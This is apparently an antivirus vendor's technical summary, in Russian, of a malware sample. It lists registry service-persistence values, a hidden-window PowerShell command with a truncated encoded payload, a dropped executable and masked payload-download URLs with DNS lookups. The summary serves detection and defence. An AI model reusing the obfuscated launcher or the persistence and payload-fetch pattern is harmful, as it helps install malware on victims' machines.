Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\runipmi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\runipmi] 'ImagePath' = '"%WINDIR%\SysWOW64\runipmi.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGEAeQB1AHgAegBwAHQAawB0AD0AJwBJAHcAcgB1AGcAagB1AGMAYwByAGoAJwA7ACQARABjAGQAeABzAGoAZABuAGIAZQAgAD0AIAAnADcAOQA2ACcAOwAkAFcAbwBmAGIAaAB4AGkAbAA9ACcAWgB0AHgAbwBoAGMAeQBqAHoAcQA...
- %HOMEPATH%\796.exe
- %HOMEPATH%\796.exe в %WINDIR%\syswow64\runipmi.exe
- http://aj###namlak.com/wp-content/rcz9/
- http://ma###group.com/wp-admin/mtq/
- http://www.me###e-jp.com/images/Tznj/
- http://10#.6.23.40/fzGoVe
- DNS ASK aj###namlak.com
- DNS ASK ma###group.com
- DNS ASK me###e-jp.com
- '%HOMEPATH%\796.exe'
- '%WINDIR%\syswow64\runipmi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGEAeQB1AHgAegBwAHQAawB0AD0AJwBJAHcAcgB1AGcAagB1AGMAYwByAGoAJwA7ACQARABjAGQAeABzAGoAZABuAGIAZQAgAD0AIAAnADcAOQA2ACcAOwAkAFcAbwBmAGIAaAB4AGkAbAA9ACcAWgB0AHgAbwBoAGMAeQBqAHoAcQA...' (со скрытым окном)